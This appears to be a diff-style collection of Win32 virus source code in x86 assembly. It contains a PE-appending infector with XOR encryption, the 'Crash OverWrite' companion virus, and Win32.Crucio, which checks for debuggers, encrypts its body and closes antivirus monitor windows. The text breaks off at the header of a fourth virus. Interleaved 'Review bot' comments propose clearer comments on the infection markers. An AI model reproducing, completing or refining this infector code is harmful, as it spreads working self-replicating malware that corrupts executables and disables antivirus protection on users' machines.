mov eax, [ebp+offset aSetFilePointer]
call eax
pop ebp
inc eax ;if fail, eax=0FFFFFFFFh. eax = eax+1
cmp eax, 0h
jz ErrorReadExe
mov ebx, dword ptr [ebp+offset MemoryHandle]
mov esi, dword ptr [ebp+offset MemoryHandle]
cmp word ptr [esi], "ZM"
jnz ErrorReadExe
xor eax, eax ;eax = 0
mov eax, dword ptr [esi+3ch] ;eax = offset PE Header
add esi, eax ;esi = point to PE Header
cmp dword ptr [esi], "EP" ;PE file ?
jz StartInfect
mov dword ptr [ebp+offset InfectFlag], 0FFh
jmp ErrorReadExe
StartInfect:
mov dword ptr [ebp+offset PEHeader], esi
cmp dword ptr [esi+4ch], "31" ;infected?
jz InfectError
mov dword ptr [esi+4ch], "31" ;put the infected symbol
mov ebx, [esi+74h] ;ebx=NumberOfRvaAndSizes
shl ebx, 3 ;ebx=ebx*8
xor eax, eax ;eax=0
mov ax, word ptr [esi+06h] ;ax = Number of Sections
dec eax ;eax=eax-1
mov ecx, 28h
mul ecx ;eax=eax*ecx
add eax, ebx
add esi, 78h
add esi, eax ;now esi point to Last Section
mov edi, dword ptr [ebp+offset PEHeader] ;edi=PE Header
mov eax, [esi+0ch] ;eax= VirtualAddress
add eax, dword ptr [esi+10h] ;eax = VirtualAddress+SizeOfRawData
mov dword ptr [ebp+offset NewEip], eax
xchg eax, [edi+28h] ;eax = Original AddressOfEntryPoint
add eax, [edi+34h] ;eax= Original AddressOfEntryPoint+ImageBase
mov dword ptr [ebp+offset OldEip], eax ;save as OldEip
mov ecx, total_size
add [esi+08h], ecx ;New VirtualSize= Original VirtualSize+VirusSize
mov eax, [esi+08h] ;eax = New VirtualSize
add eax, [esi+0ch] ;eax = New VirtualSize+VirtualAddress
mov [edi+50h], eax ;eax=SizeOfImage
mov eax, [esi+10h] ;eax=SizeOfRawData
add [esi+10h], ecx ;New SizeOfRawData= Old SizeOfRawData+VirusSize
or dword ptr [esi+24h], 0A0000020h
mov edi, [esi+14h]
mov ebx, dword ptr [ebp+offset MemoryHandle]
add edi, ebx
add edi, eax
mov esi, offset VirusStart
add esi, ebp
pushad
mov byte ptr [ebp+offset CryptKey], 0ffh
call Crypt
popad
rep movsb
call Crypt
lea eax, [ebp+offset ByteRead]
push ebp
push 0h
push eax
push dword ptr [ebp+offset NewFileSize]
push dword ptr [ebp+offset MemoryHandle]
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aWriteFile]
call eax
pop ebp
InfectError:
ErrorReadExe:
push ebp
push dword ptr [ebp+offset MemoryHandle]
mov eax, [ebp+offset aGlobalFree]
call eax
pop ebp
ErrorBuffer:
push ebp
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aCloseHandle]
call eax
pop ebp
ErrorOpenExe:
push ebp
push dword ptr [ebp+offset FileAttribute]
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aSetFileAttributesA]
call eax
pop ebp
jmp InfectCheck
InfectFail:
stc
jmp JumpOut
InfectCheck:
cmp dword ptr [ebp+offset InfectFlag], 0FFh
jz InfectFail
clc
JumpOut:
popad
ret
;----------------------------------------------------------------------------------
;Searching Kernel32.dll address
;----------------------------------------------------------------------------------
GetK32 PROC
ScanK32:
cmp word ptr [esi], "ZM"
je K32Found
sub esi, 1000h
jmp ScanK32
K32Found:
mov eax, esi
ret
GetK32 endp
;------------------------------------------------------------------------------------
;Searching The APIs function
;edi=API offset
;esi=API name
;------------------------------------------------------------------------------------
GetApis PROC
@@1:
mov eax, dword ptr [ebp+aKernel32]
push esi
push edi
call GetApi
pop edi
pop esi
mov [edi], eax ;store API address in eax ----> edi
add edi, 4
@@3:
inc esi
cmp byte ptr [esi], 0
jne @@3
inc esi
cmp byte ptr [esi], 0FFh ;ended?
jnz @@1
ret
GetApis endp
GetApi PROC
mov ebx, [eax+3ch] ;ebx=offset PE header
add ebx, eax ;ebx=point to PE header
mov ebx, [ebx+78h] ;ebx=point to ExportDirectory Virtual Address
add ebx, eax ;normalize, ebx=point to ExportDirectory
xor edx, edx ;edx=0
mov ecx, [ebx+20h] ;ecx=point to AddressOfNames
add ecx, eax ;normalize
push esi ;save to stack
push edx ;save to stack
NextApi:
pop edx
pop esi
inc edx ;edx=the index into AddressOfOrdinals+1
mov edi, [ecx] ;edi=API function export by Kernel32.dll
add edi, eax ;normalize
add ecx, 4 ;point to next API function
push esi ;save to stack
push edx
CompareApi:
mov dl, [edi] ;dl=API function export by Kernel32.dll
mov dh, [esi] ;dh=API function we looking for
cmp dl, dh ;match?
jne NextApi ;not match....ok...next API
inc edi ;if match, compare next byte
inc esi
cmp byte ptr [esi], 0 ;finish?
je GetAddr ;jmp to get the address of API function
jmp CompareApi
GetAddr:
pop edx
pop esi
dec edx ;edx-1 (because edx=index point to zero -finish)
shl edx, 1 ;edx=edx*2
mov ecx, [ebx+24h]
add ecx, eax
add ecx, edx ;ecx=ordinals
xor edx,edx
mov dx, [ecx]
shl edx, 2 ;edx=edx*4
mov ecx, [ebx+1ch] ;ecx=RVA AddressOfFunctions
add ecx, eax ;normalize
add ecx, edx
add eax, [ecx] ;eax=address of API function we looking for
ret
GetApi endp
;-----------------------------------------------------------------------------
;call special API MessageBoxA
;-----------------------------------------------------------------------------
SpecialApi proc
push offset User32Dll
mov eax, dword ptr [ebp+offset aLoadLibraryA]
call eax
mov esi, offset sMessageBoxA
push esi
push eax
mov eax, dword ptr [ebp+offset aGetProcAddress]
call eax
mov dword ptr [ebp+offset aMessageBoxA], eax
ret
SpecialApi endp
;------------------------------------------------------------------------------
;Encrypt/Decrypt Virus Data
;------------------------------------------------------------------------------
Crypt:
mov esi, offset CryptStart
add esi, ebp
mov ah, byte ptr [ebp+offset CryptKey]
mov ecx, CryptEnd-CryptStart
CryptLoop:
xor byte ptr [esi], ah
inc esi
loop CryptLoop
ret
;-------------------------------------------------------------------------------
;Pop up message
;-------------------------------------------------------------------------------
FirstGeneration:
push 0
push offset szTopic
push offset szText
push 0
mov eax, dword ptr [ebp+offset aMessageBoxA]
call eax
push 0
mov eax, dword ptr [ebp+offset aExitProcess]
call eax
;-----------------------------------------------------------------------------
;APIs function needed.
;-----------------------------------------------------------------------------
sMessageBoxA db "MessageBoxA", 0
aMessageBoxA dd 00000000h
@@Namez label byte
sGetProcAddress db "GetProcAddress", 0
sLoadLibraryA db "LoadLibraryA", 0
sExitProcess db "ExitProcess", 0
sGetWindowsDirectoryA db "GetWindowsDirectoryA", 0
sGetSystemDirectoryA db "GetSystemDirectoryA", 0
sGetCurrentDirectoryA db "GetCurrentDirectoryA", 0
sSetCurrentDirectoryA db "SetCurrentDirectoryA", 0
sFindFirstFileA db "FindFirstFileA", 0
sFindNextFileA db "FindNextFileA", 0
sFindClose db "FindClose", 0
sGlobalAlloc db "GlobalAlloc", 0
sGlobalFree db "GlobalFree", 0
sGetFileAttributesA db "GetFileAttributesA", 0
sSetFileAttributesA db "SetFileAttributesA", 0
sCreatFileA db "CreateFileA", 0
sReadFile db "ReadFile", 0
sWriteFile db "WriteFile", 0
sGetFileTime db "GetFileTime",0
sGetFileSize db "GetFileSize", 0
sCreateFileMapping db "CreateFileMapping", 0
sMapViewOfFile db "MapViewOfFile", 0
sUnmapViewOfFile db "UnmapViewOfFile", 0
sCloseHandle db "CloseHandle", 0
sSetFileTime db "SetFileTime", 0
sSetFilePointer db "SetFilePointer", 0
sSetEndOfFile db "SetEndOfFile", 0
db 0FFh
@@Offsetz label byte
aGetProcAddress dd 00000000h
aLoadLibraryA dd 00000000h
aExitProcess dd 00000000h
aGetWindowsDirectoryA dd 00000000h
aGetSystemDirectoryA dd 00000000h
aGetCurrentDirectoryA dd 00000000h
aSetCurrentDirectoryA dd 00000000h
aFindFirstFileA dd 00000000h
aFindNextFileA dd 00000000h
aFindClose dd 00000000h
aGlobalAlloc dd 00000000h
aGlobalFree dd 00000000h
aGetFileAttributesA dd 00000000h
aSetFileAttributesA dd 00000000h
aCreateFileA dd 00000000h
aReadFile dd 00000000h
aWriteFile dd 00000000h
aGetFileTime dd 00000000h
aGetFileSize dd 00000000h
aCreateFileMapping dd 00000000h
aMapViewOfFile dd 00000000h
aUnmapViewOfFile dd 00000000h
aCloseHandle dd 00000000h
aSetFileTime dd 00000000h
aSetFilePointer dd 00000000h
aSetEndOfFile dd 00000000h
;------------------------------------------------------------------------------
;Parameters
;------------------------------------------------------------------------------
aKernel32 dd 00000000h
Counter dd 00000000h
SearchHandle dd 00000000h
FileHandle dd 00000000h
FilePointer dd 00000000h
OriginalFileTime dd 00000000h
MapSize dd 00000000h
FileAttribute dd 00000000h
MemoryHandle dd 00000000h
MapAddress dd 00000000h
OldRawSize dd 00000000h
NewRawSize dd 00000000h
NewFileSize dd 00000000h
PEHeader dd 00000000h
FileAlign dd 00000000h
IncreaseRaw dd 00000000h
InfectFlag dd 00000000h
OriFileSize dd 00000000h
AppBase dd 00400000h
ByteRead dd ?
User32Dll db "User32.dll", 0 ;User32.dll
WindowsDir db 128h dup (0)
SystemDir db 128h dup (0)
Mark db "*.exe", 0 ;target file *.exe
RedundantSize equ (offset delta - offset VirusStart)
total_size equ (offset VirusEnd - offset VirusStart)
szTopic db "F-13 Labs", 0
szText db "Author:lclee_vx", 0
max_path equ 260
MinimumFileSize equ 1024d
filetime STRUC ;file time structure
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
filetime ENDS
win32_find_data STRUC
FileAttributes DD ? ; attributes
CreationTime filetime ? ; time of creation
LastAccessTime filetime ? ; last access time
LastWriteTime filetime ? ; last modificationm
FileSizeHigh DD ? ; filesize
FileSizeLow DD ? ; -"-
Reserved0 DD ? ;
Reserved1 DD ? ;
FileName DB max_path DUP (?) ; long filename
AlternateFileName DB 13 DUP (?) ; short filename
DB 3 DUP (?) ; dword padding
win32_find_data ENDS ;
;
Win32FindData win32_find_data ? ; our search area
CryptKey db ?
VirusEnd:
ends
end VirusStart
+224
@@ -0,0 +1,224 @@
comment *
Name: Crash OverWrite :-)
Coder: BeLiAL
Type: Companion
Anything else: NO
This is my first win32 virus.Its only a
companionvirus but it does his work very
well.Its perhaps coded not so fine but
im sure nobody will care.It infects all
files in the directory and renames
the victimfile to .dat .Perhaps i will make
infecting more files...
Its without payload and any weapons :)
It Doesnt infect dos-files correctly.
Greetings to the whole #vx channel on undernet
BeLiAL
*
.386
.model flat
Locals
Jumps
Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC
.data
MAX_PATH EQU 0ffh
FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 01h
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
searchhandle dd 0
db '[Crash OverWrite] coded by BeLiAL'
.code
start:
push offset FindFileData
push offset exefile
call FindFirstFileA
mov searchhandle,eax
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je find_next_victim
mov eax,offset cFileName.FindFileData
jmp find_dot1
find_next_victim:
push offset FindFileData
push searchhandle
call FindNextFileA
test eax,eax
jz reanimate
jmp already_infected
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je find_next_victim
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
jmp find_next_victim
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess
ends
end start
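Review bot: The already-infected test at `already_infected` (the `cmp eax,00001000h` against nFileSizeLow) is undocumented, and it is the only thing that stops re-processing a file; a comment stating what the comparison means would help anyone triaging this sample, e.g. `; skip files whose size equals filesize (1000h) - treated as already processed`. The same constant is reused as the ReadFile/WriteFile length at `copyinmemory` and `copy_to_file`, so a note at the `filesize dd 00001000h` definition that it serves both as the copy length and as the size marker would make the coupling explicit.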
+729
@@ -0,0 +1,729 @@
; ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
; ccc rrrr u u ccc i oo
; c r r u u c i o o
; c r r u u c i o o
; c r r u u c i o o
; c rrrr u u c i o o
; c r r u u c i o o
; c r r u u c i o o
; ccc r r uu ccc i oo
; ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
;Win32.Crucio by powerdryv = Surya
;This was my very 1st of the viruses.Now, since I wanted to contribute
;to 29A,I value-added to this virus. The virus now is encrypted with a
;simple Sliding Key Alogo.,(XOR being the operation). For each dword
;being encrypted the Key increases by 4.After the XOR operation is per-
;formed the dword gets again encrypted thru FPU instuction.The algo.
;used for encryption is simple.In 1st step the dword get squared, then
;its added to itself and again it gets squared.So u see the simplicity.
; Anti-Emulation : Yes, again using FPI
; Anti-AV : Shuts down AV monitors
; PayLoad : On every 25th of month shows a message box
; Resident : No
; Poly : No
; Sets up SEH frams, (well that's a necessity)
.586
.587
.model flat
jumps
extrn ExitProcess:proc
extrn MessageBoxA:proc
SizeOfVirus equ (offset EndOfVirus-StartOfVirus)/4
EncodedVirus equ (EEndOfVirus-EStartOfVirus)/4
SizeOne equ (StartOfVirus-EStartOfVirus)/4
.data
szTitle db "Win32.Crucio by Surya",0
Message db "In every color there's the light",13
db "In every stone sleeps a crystal",13
db "Remember the Shaman when he used to say:",13
db "Man is the dream of the dolphin.",0
SoftIce9x db "\\.\SICE",0
SoftIceNT db "\\.\NTSICE",0
.code
StartOfVirus label byte
Start: call Delta
Delta: fnop
pop ebp
mov eax, offset Delta
fild [ebp]
fild [eax]
fsub
fabs
fnop
fistp dword ptr [Impy]
mov ebp, Impy
call CheckDebggers
mov ecx, EncodedVirus
lea edi, [ebp+EStartOfVirus]
call Decoder
jmp RealStart
Impy dd 0
RealStart:
EStartOfVirus label byte
mov esi, [esp]
and esi, 0FFFF0000h
mov ecx, 5
Check4MZ:
sub esi, 10000h
cmp word ptr [esi], "ZM"
je Check4PE
loop Check4MZ
mov ecx, cs
xor cl, cl
jecxz WinNT
mov esi, 0BFF70000h
jmp Check4PE
WinNT:
mov esi, 077F00000h
Check4PE: cmp dword ptr [esi+80h], 'EP'
jne Check4MZ
mov dword ptr [ebp+@Kernel@], esi
xchg eax, esi
call SetSEH
mov esp, [esp+8h]
jmp ResSEH
SetSEH:
push dword ptr fs:[0]
mov fs:[0], esp
@1: lea edi, [ebp+ApiOffsets]
lea esi, [ebp+ApiNames]
call GetApi
call CloseAV
CheckDebggers2:
push 0
push 80h
push 3h
push 0h
push 1h
push 0C0000000h
push offset SoftIce9x
call [ebp+@CreateFileA@]
inc eax
jnz Detected
dec eax
push 0
push 80h
push 3h
push 0h
push 1h
push 0C0000000h
push offset SoftIceNT
call [ebp+@CreateFileA@]
inc eax
jnz Detected
dec eax
PayLoad:
lea eax, [ebp+Samay]
push eax
call [ebp+@GetSystemTime@]
cmp word ptr [ebp+S_wDay], 25h
je Detected
call MainInfection1
call MainInfection2
ResSEH:
pop dword ptr fs:[0]
push 0
call ExitProcess
MainInfection1:
push 128
lea eax, [ebp+offset windir]
push eax
mov eax, [ebp+offset @GetWindowsDirectoryA@]
call eax
push 128
lea eax, [ebp+offset sysdir]
push eax
mov eax, [ebp+offset @GetSystemDirectoryA@]
call eax
Return: ret
MainInfection2:
@3: lea eax, [ebp+windir]
push eax
call [ebp+@SetCurrentDirectoryA@]
call FindThem
jmp ResSEH
lea eax, [ebp+sysdir]
push eax
call [ebp+@SetCurrentDirectoryA@]
call FindThem
jmp ResSEH
FindThem proc
lea eax, [ebp+Win32_Find_Data]
push eax
lea eax, [ebp+EXEtension]
push eax
call [ebp+@FindFirstFileA@]
inc eax
jz Failed2Find
dec eax
mov dword ptr [ebp+SearchHandle], eax
@@1:
push dword ptr [ebp+OldEIP]
push dword ptr [ebp+NewBase]
call InfectThem
pop dword ptr [ebp+NewBase]
push dword ptr [ebp+OldEIP]
@@2:
lea edi, [ebp+Win32_Find_Data]
mov ecx, MAX_PATH
xor al, al
rep stosb
lea eax, [ebp+Win32_Find_Data]
push eax
push dword ptr [ebp+EXEtension]
call [ebp+@FindNextFileA@]
test eax, eax
jz Failed2Find
jmp @@1
@@3:
push dword ptr [ebp+SearchHandle]
call [ebp+@FindClose@]
Failed2Find: ret
FindThem endp
GetApi proc
@_1: push esi
push edi
call GetTheApis
pop edi
pop esi
stosd
xchg edi, esi
xor al, al
@_2: scasb
jnz @_2
xchg edi, esi
@_3: cmp byte ptr [esi], 0BBh
je Return2
jmp @_1
Return2: ret
GetApi endp
GetTheApis proc
mov edx, esi
mov edi, esi
xor al, al
@@_1: scasb
jnz @@_1
sub edi, esi
mov ecx, edi
xor eax, eax
mov word ptr [ebp+Counter], ax
mov esi, [ebp+@Kernel@]
add esi, 3ch
lodsw
add eax, [ebp+@Kernel@]
mov esi, [eax+78h]
add esi, 1ch
add esi, [ebp+@Kernel@]
lodsd
add eax, [ebp+@Kernel@]
mov dword ptr [ebp+@AddyTable@], eax
lodsd
add eax, [ebp+@Kernel@]
push eax
lodsd
add eax, [ebp+@Kernel@]
mov dword ptr [ebp+@OrdinalTable@], eax
pop esi
xor ebx,ebx
@@_2: push esi
lodsd
add eax, [ebp+@Kernel@]
mov esi, eax
mov edi, edx
push ecx
cld
rep cmpsb
pop ecx
jz @@_3
pop esi
add esi, 4
inc ebx
inc word ptr [ebp+Counter]
jmp @@_2
@@_3: pop esi
movzx eax, word ptr [ebp+Counter]
shl eax, 1
add eax, dword ptr [ebp+@OrdinalTable@]
xor esi, esi
xchg eax, esi
lodsw
shl eax, 2
add eax, dword ptr [ebp+@AddyTable@]
mov esi, eax
lodsd
add eax, [ebp+@Kernel@]
ret
GetTheApis endp
InfectThem proc
lea eax, [ebp+WFD_szFileName]
push 80h
push eax
call [ebp+@SetFileAttributesA@]
call OpenIt
inc eax
jz Failed2Open
dec eax
mov [ebp+FileHandle], eax ;dword ptr
mov ecx, [ebp+WFD_nFileSizeLow]
call CreateMapOfIt
test eax, eax
jz CantMap ;to Close the file
mov [ebp+MapHandle], eax
call MapIt
test eax, eax
jz UnmapIt
mov [ebp+MapAddy], eax
mov esi, [eax+3ch]
add esi, eax
cmp dword ptr [esi], 'EP'
jne LeaveIt
cmp dword ptr [esi+4ch], 'aea' ;Gaea
jne LeaveIt
push dword ptr [esi+3ch]
push dword ptr [ebp+MapAddy]
call [ebp+@CloseHandle@]
pop ecx
mov eax, [ebp+WFD_nFileSizeLow]
add eax, SizeOfVirus
call AlignIt
xchg ecx, eax
call CreateMapOfIt
test eax, eax
jz CantMap ;to Close the file
mov [ebp+MapHandle], eax
mov ecx, [ebp+NewSize]
call MapIt
test eax, eax
jz UnmapIt
mov [ebp+MapAddy], eax
mov esi, [eax+3ch]
add esi, eax
mov [ebp+PEHeader], esi
xor eax, eax
mov ax, word ptr [esi+6ch] ;
dec eax
imul eax, eax, 28h
add esi, 78h
add esi, eax
mov ebx, [ebp+PEHeader+74h]
shl ebx, 3
add esi, ebx
mov eax, [ebp+PEHeader+28h]
mov [ebp+OldEIP], eax ;dword ptr
mov eax, [ebp+PEHeader+34h]
mov [ebp+NewBase], eax ;dword ptr
mov ebx, [esi+10h]
mov edx, ebx
mov ebx, [esi+14h]
push ebx
mov edi, [ebp+PEHeader]
mov eax, edx
add eax, [esi+0ch]
mov [edi+28h], eax
mov dword ptr [ebp+NewEIP], eax
mov eax, [esi+10h]
add eax, SizeOfVirus
mov ecx, [edi+3ch]
call AlignIt
mov [esi+10h], eax
mov [esi+08h], eax
pop ebx
mov eax, [esi+10ch]
add eax, [esi+0ch]
mov [edi+50h], eax
or dword ptr [esi+24h], 0A0000020h
mov dword ptr [edi+4ch], 'aea'
lea esi, [ebp+Start]
mov edi, ebx
add edi, dword ptr [ebp+MapAddy]
mov ecx, SizeOne
rep movsd
mov ecx, EncodedVirus
lea esi, [ebp+RealStart]
call RandomNo
mov [ebp+EncKey], eax
finit
Loop1: xor esi, [ebp+EncKey]
add [ebp+EncKey], 4h
fild dword ptr [esi]
fild dword ptr [esi]
fmul
fadd st, st
fistp dword ptr [ebx]
fild dword ptr [ebx]
fild dword ptr [ebx]
fmul
fistp dword ptr [esi]
movsd
add esi, 4h
loop Loop1
lea esi, [ebp+Decoder]
mov ecx, (Ending-Decoder)/4
Loop3:
movsd
add esi, 4h
loop Loop3
jmp UnmapIt
LeaveIt:
call TruncateIt
UnmapIt:
push dword ptr [ebp+MapAddy]
call [ebp+@UnmapViewOfFile@]
push dword ptr [ebp+MapHandle]
call [ebp+@CloseHandle@]
CantMap:
push dword ptr [ebp+FileHandle]
call [ebp+@CloseHandle@]
jmp ResSEH
Detected:
push 0
push offset szTitle
push offset Message
push 00h
call MessageBoxA
push 0
call ExitProcess
Failed2Open:
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp+WFD_szFileName]
push eax
call [ebp+@SetFileAttributesA@]
ret
InfectThem endp
AlignIt proc
push ebx
xor ebx, ebx
push eax
div ecx
pop eax
sub ecx, ebx
add eax, ecx
pop ebx
ret
AlignIt endp
CreateMapOfIt proc
push 0
push ecx
push 0
push 4h
push dword ptr [ebp+FileHandle]
call [ebp+@CreateFileMappingA@]
ret
CreateMapOfIt endp
MapIt proc
push ecx
push 0
push 0
push 2h
push dword ptr [ebp+MapHandle]
call [ebp+@MapViewOfFile@]
ret
MapIt endp
OpenIt proc
push 0
push 0
push 3h
push 0
push 1h
push 80000000h or 40000000h
push eax
call [ebp+@CreateFileA@]
ret
OpenIt endp
TruncateIt proc
push 0
push 0
push ecx
push dword ptr [ebp+FileHandle]
call [ebp+@SetFilePointer@]
push dword ptr [ebp+FileHandle]
call [ebp+@SetEndOfFile@]
ret
TruncateIt endp
RandomNo proc
db 0fh, 31h
mov [ebp+Ran0], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran1], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran2], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran3], eax
add eax, [ebp+Ran1]
call ClDoer
ror eax, cl
add eax, [ebp+Ran0]
shl eax, 7h
call ClDoer
rol eax, cl
add eax, [ebp+Ran2]
sub eax, [ebp+Ran3]
call ClDoer
ror eax, cl
mov [ebp+EncKey], eax
ret
ClDoer proc near
in al, 40h
mov cl, al
ret
ClDoer endp
RandomNo endp
CloseAV proc
lea eax, [ebp+AVList]
Loop2:
call CloseAVs
xor al, al
scasb
jnz $-1
cmp byte ptr [edi], 0BBh
jnz Loop2
ret
CloseAV endp
CloseAVs proc
push edi
push 0
call [ebp+@FindWindowA@]
test eax, eax
jz Return3
push 0
push 0
push 12h
push eax
call [ebp+@PostMessageA@]
xor cl, cl
org $-1
Return3:
ret
CloseAVs endp
db "I inspire.....",0
ApiNames label byte
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CloseHandle db "CloseHandle",0
@GetCurrentDirectoryA db "GetCurrentDirectoryA",0
@SetCurrentDirectoryA db "SetCurrentDirectoryA",0
@GetWindowsDirectoryA db "GetWindowsDirectoryA",0
@GetSystemDirectoryA db "GetSystemDirectoryA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0
@GetTickCount db "GetTickCount",0
@GetSystemTime db "GetSystemTime",0
@FindWindowA db "FindWindowA",0
@PostMessageA db "PostMessageA",0
db 0BBh
AVList label byte
db "AVP Monitor",0
db "Amon Antivirus Monitor",0
db "McAfee Scan",0
db 0BBh
EXEtension db '*.exe',0
@Kernel@ dd 00000000h
EncKey dd 00000000h
@Start@ dd 00000000h
@AddyTable@ dd 00000000h
@OrdinalTable@ dd 00000000h
FileHandle dd 00000000h
SearchHandle dd 00000000h
MapHandle dd 00000000h
MapAddy dd 00000000h
PEHeader dd 00000000h
NewEIP dd 00000000h
NewSize dd 00000000h
Counter dw 0000h
ApiOffsets label byte
@FindFirstFileA@ dd 0
@FindNextFileA@ dd 0
@FindClose@ dd 0
@CreateFileA@ dd 0
@SetFilePointer@ dd 0
@SetFileAttributesA@ dd 0
@CloseHandle@ dd 0
@GetCurrentDirectoryA@ dd 0
@SetCurrentDirectoryA@ dd 0
@GetWindowsDirectoryA@ dd 0
@GetSystemDirectoryA@ dd 0
@CreateFileMappingA@ dd 0
@MapViewOfFile@ dd 0
@UnmapViewOfFile@ dd 0
@SetEndOfFile@ dd 0
@GetTickCount@ dd 0
@GetSystemTime@ dd 0
@FindWindowA@ dd 0
@PostMessageA@ dd 0
Ran1 dd 0
Ran2 dd 0
Ran0 dd 0
Ran3 dd 0
MAX_PATH equ 260
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
Win32_Find_Data label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db MAX_PATH dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
Samay label byte
S_wYear dw ?
S_wMonth dw ?
S_wDayOfWeek dw ?
S_wDay dw ?
S_wHour dw ?
S_wMinute dw ?
S_wSecond dw ?
S_wMilliseconds dw ?
sysdir db 128h dup(0)
windir db 128h dup(0)
curdir db 128h dup(0)
OldEIP dd 0
NewBase dd 0
EEndOfVirus label byte
Decoder proc
test ebp, ebp
jz EndDecod
mov eax, dword [ebp+EncKey]
mov ebx, 2h
finit
Looploopy:
mov edx, dword ptr [edi]
fild dword ptr [edx]
fsqrt
fistp dword ptr [Var1]
fild dword ptr [ebx]
fild dword ptr [Var1]
fdiv
fsqrt
xor edx, eax
add eax, 4h
mov dword ptr [edi], edx
add edi, 4
loop Looploopy
EndDecod: ret
CheckDebggers:
mov ecx, fs:[20h]
jecxz EndDecod
mov dword ptr [ebp+EncKey], -1
ret
Decoder endp
Var1 dd 0
EndOfVirus label byte
Ending: end Start
; I inspire....
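Review bot: The marker written at `mov dword ptr [edi+4ch], 'aea'` and tested at `cmp dword ptr [esi+4ch], 'aea'` is documented only by the trailing `;Gaea` on the compare, which does not say that the field at PE header +4Ch is being used as an infection flag; a comment at the store such as `; marker: PE header +4Ch (Checksum field) set to 'aea' - checked before processing a file` would make this identifiable for analysts. The `AVList` strings and the `CloseAV`/`CloseAVs` routines are likewise uncommented beyond the header line "Shuts down AV monitors"; naming what is matched (window titles passed to FindWindowA, then PostMessageA with 12h) at `AVList label byte` would help triage as well.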
+944
@@ -0,0 +1,944 @@
;============================================================================
;
;
; NAME: Win32.Darling v1.00
; TYPE: Direct-action variable-encrypting PE-infector.
; SIZE: Around 1700 bytes.
; AUTHOR: T-2000 / [Immortal Riot].
; E-MAIL: T2000_@hotmail.com
; DATE: May 1999.
; PAYLOAD: Randomly pops-up a message-box.
;
;
; FEATURES:
;
; - True Win32-compatible (Win-95/98/NT).
